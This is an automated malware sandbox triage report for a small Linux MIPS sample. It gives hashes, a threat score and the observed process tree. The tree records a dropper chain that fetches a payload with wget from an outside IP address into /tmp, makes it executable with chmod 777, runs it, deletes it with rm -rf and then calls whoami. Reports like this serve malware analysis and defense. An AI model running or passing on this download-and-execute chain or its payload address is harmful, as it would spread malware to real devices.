ffe9a29f878e5f4858347527510d65fd8d9d59a071dfb7a5d6ee8ce64394819a | Triage

Analysis

max time kernel
0s
max time network
14s
platform
linux_mips
resource
debian9-mipsbe-en-20211208
resource tags

arch:mipsimage:debian9-mipsbe-en-20211208kernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
09-08-2022 11:50

Sharing

Report Analysis Logs

General

Target

b
Size

449B
MD5

1b6c2e23804389fb3c4a9ddcce882f5d
SHA1

0c086d7aa61e5c5a4de5c4e4d769c9c7440c8bbd
SHA256

ffe9a29f878e5f4858347527510d65fd8d9d59a071dfb7a5d6ee8ce64394819a
SHA512

8a4300b60ee626a8b7a9719ee1b16378802a3989f78ad895c4f3c17d385a0ae76d3113c50095b343f7836db5b7356e31f342afecf199c005d3ee2f26d40d741a

Score

5^/10

Malware Config

Signatures

Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.

Processes:

rmbwgetindexrm

description ioc process

/tmp/index /tmp/index rm
/tmp/b /tmp/b b
/tmp/index /tmp/index wget
/tmp/index /tmp/index index
/tmp/index /tmp/index rm

/tmp/b
/tmp/b
1⤵
- Writes file to tmp directory
PID:331

/usr/bin/wget
wget http://103.16.170.89:8080/docs/Ls -O /tmp/index
2⤵
- Writes file to tmp directory
PID:333

/bin/chmod
chmod 777 /tmp/index
2⤵
PID:338

/tmp/index
/tmp/index
2⤵
- Writes file to tmp directory
PID:339

/bin/sleep
sleep 2
2⤵
PID:341

/bin/rm
rm -rf /tmp/index
2⤵
- Writes file to tmp directory
PID:342

/bin/rm
rm -rf "/tmp/index "
2⤵
- Writes file to tmp directory
PID:343

/usr/bin/whoami
whoami
2⤵
PID:344

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...